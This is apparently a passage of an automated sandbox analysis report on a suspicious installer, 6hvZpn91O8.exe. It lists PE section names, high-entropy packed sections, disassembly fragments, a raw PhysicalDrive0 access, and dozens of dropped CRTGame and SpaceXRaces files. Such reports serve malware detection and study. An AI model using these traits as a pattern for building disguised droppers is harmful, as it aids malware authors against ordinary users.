                  Source: is-G7PIK.tmp.1.dr | Static PE information: section name: /81
                  Source: is-G7PIK.tmp.1.dr | Static PE information: section name: /92
                  Source: is-HAM7K.tmp.1.dr | Static PE information: section name: .trace
                  Source: is-HAM7K.tmp.1.dr | Static PE information: section name: _RDATA
                  Source: is-HAM7K.tmp.1.dr | Static PE information: section name: .debug_o
                  Source: is-12J2O.tmp.1.dr | Static PE information: section name: /4
                  Source: is-73F5N.tmp.1.dr | Static PE information: section name: /4
                  Source: is-849ND.tmp.1.dr | Static PE information: section name: /4
                  Source: is-RHF7D.tmp.1.dr | Static PE information: section name: /4
                  Source: is-S02KC.tmp.1.dr | Static PE information: section name: /4
                  Source: is-FGLVG.tmp.1.dr | Static PE information: section name: /4
                  Source: is-2CGLR.tmp.1.dr | Static PE information: section name: /4
                  Source: is-UMM6D.tmp.1.dr | Static PE information: section name: /4
                  Source: is-7Q436.tmp.1.dr | Static PE information: section name: /4
                  Source: is-HASL7.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-HASL7.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-HASL7.tmp.1.dr | Static PE information: section name: petite
                  Source: is-Q2C64.tmp.1.dr | Static PE information: section name: /4
                  Source: is-5IVSF.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-5IVSF.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-5IVSF.tmp.1.dr | Static PE information: section name: petite
                  Source: is-IG6J1.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-IG6J1.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-IG6J1.tmp.1.dr | Static PE information: section name: petite
                  Source: is-640V1.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-640V1.tmp.1.dr | Static PE information: section name: petite
                  Source: is-FJ939.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-FJ939.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-FJ939.tmp.1.dr | Static PE information: section name: petite
                  Source: is-K8VM1.tmp.1.dr | Static PE information: section name: /4
                  Source: is-NH7NT.tmp.1.dr | Static PE information: section name: .sxdata
                  Source: is-OJ8GN.tmp.1.dr | Static PE information: section name: .didata
                  Source: is-KCF1P.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-KCF1P.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-KCF1P.tmp.1.dr | Static PE information: section name: petite
                  Source: is-HS78I.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-HS78I.tmp.1.dr | Static PE information: section name: petite
                  Source: is-DQCHN.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-DQCHN.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-DQCHN.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-BDC3N.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-BDC3N.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-BDC3N.tmp.1.dr | Static PE information: section name: petite
                  Source: is-65BJ1.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-65BJ1.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-65BJ1.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-ONP9R.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-ONP9R.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-ONP9R.tmp.1.dr | Static PE information: section name: petite
                  Source: is-KANF7.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-KANF7.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-KANF7.tmp.1.dr | Static PE information: section name: petite
                  Source: is-OMMAA.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-OMMAA.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-OMMAA.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-UT0J0.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-UT0J0.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-UT0J0.tmp.1.dr | Static PE information: section name: petite
                  Source: is-NG6SA.tmp.1.dr | Static PE information: section name: /4
                  Source: is-2JPEP.tmp.1.dr | Static PE information: section name: /4
                  Source: is-RPUOD.tmp.1.dr | Static PE information: section name: /4
                  Source: is-C1CHO.tmp.1.dr | Static PE information: section name: /4
                  Source: is-766CT.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-766CT.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-766CT.tmp.1.dr | Static PE information: section name: (nameless)
                  Source: is-QECHS.tmp.1.dr | Static PE information: section name: /4
                  Source: is-C6CS8.tmp.1.dr | Static PE information: section name: .eh_fram
                  Source: is-6RB4E.tmp.1.dr | Static PE information: section name: asmcode
                  Source: is-AGPIJ.tmp.1.dr | Static PE information: section name: .eh_fram
                  Source: is-58TJN.tmp.1.dr | Static PE information: section name: /4
                  Source: is-F44SJ.tmp.1.dr | Static PE information: section name: /4
                  Source: is-V4GP3.tmp.1.dr | Static PE information: section name: /4
                  Source: SpaceXRaces.exe.4.dr | Static PE information: section name: .hsave
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Code function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax 0_2_00408109
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Code function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00409954 push 00409991h; ret 1_2_00409989
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0040A04F push ds; ret 1_2_0040A050
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0040A023 push ds; ret 1_2_0040A04D
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_004062CC push ecx; mov dword ptr [esp], eax 1_2_004062CD
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_004822F4 push 004823D2h; ret 1_2_004823CA
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_004765B0 push ecx; mov dword ptr [esp], edx 1_2_004765B1
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_004106E0 push ecx; mov dword ptr [esp], edx 1_2_004106E5
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00412938 push 0041299Bh; ret 1_2_00412993
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_004589F0 push 00458A34h; ret 1_2_00458A2C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00442C94 push ecx; mov dword ptr [esp], ecx 1_2_00442C98
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00450E58 push 00450E8Bh; ret 1_2_00450E83
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0045101C push ecx; mov dword ptr [esp], eax 1_2_00451021
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0040D038 push ecx; mov dword ptr [esp], edx 1_2_0040D03A
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0049310C push ecx; mov dword ptr [esp], ecx 1_2_00493111
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_004571B0 push 004571E8h; ret 1_2_004571E0
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0045F444 push ecx; mov dword ptr [esp], ecx 1_2_0045F448
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0040546D push eax; ret 1_2_004054A9
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0040F598 push ecx; mov dword ptr [esp], edx 1_2_0040F59A
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                  Source: crtgame.exe.1.dr | Static PE information: section name: .text entropy: 7.600836004242041
                  Source: is-DQCHN.tmp.1.dr | Static PE information: section name: (nameless) entropy: 7.953893773659523
                  Source: is-65BJ1.tmp.1.dr | Static PE information: section name: (nameless) entropy: 7.921519965168042
                  Source: is-KANF7.tmp.1.dr | Static PE information: section name: (nameless) entropy: 7.966771808365004
                  Source: is-OMMAA.tmp.1.dr | Static PE information: section name: (nameless) entropy: 7.950928332152424
                  Source: is-766CT.tmp.1.dr | Static PE information: section name: (nameless) entropy: 7.491817342209834
                  Source: SpaceXRaces.exe.4.dr | Static PE information: section name: .text entropy: 7.600836004242041

                  Persistence and Installation Behavior

                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 4_2_00401A58
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 6_2_02C2F29C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-OMMAA.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-4NPOS.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-FGLVG.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-RHF7D.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-BDC3N.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-OJ8GN.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-73F5N.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-FJ939.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-AGPIJ.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_shfoldr.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-2CG7G.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\uninstall\is-4264D.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-5IVSF.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-OF8TE.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-2CGLR.tmp
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | File created: C:\ProgramData\SpaceXRaces\SpaceXRaces.exe
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_iscrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-F44SJ.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-C6CS8.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_RegDLL.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-ML5PH.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-ONP9R.tmp
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-G7PIK.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-849ND.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-2JPEP.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-7Q436.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-12J2O.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-UT0J0.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-HASL7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-766CT.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-IG6J1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-640V1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-C1CHO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-DQCHN.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-6RB4E.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-QECHS.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-KANF7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-SGP9P.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-NG6SA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-K8VM1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-V4GP3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\crtgame.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-HS78I.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-UMM6D.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-KPUSQ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)Jump to dropped file
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeFile created: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-RNIE1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-HAM7K.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-BJBAO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-V8IE4.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-S02KC.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-RPUOD.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-65BJ1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-Q2C64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)Jump to dropped file
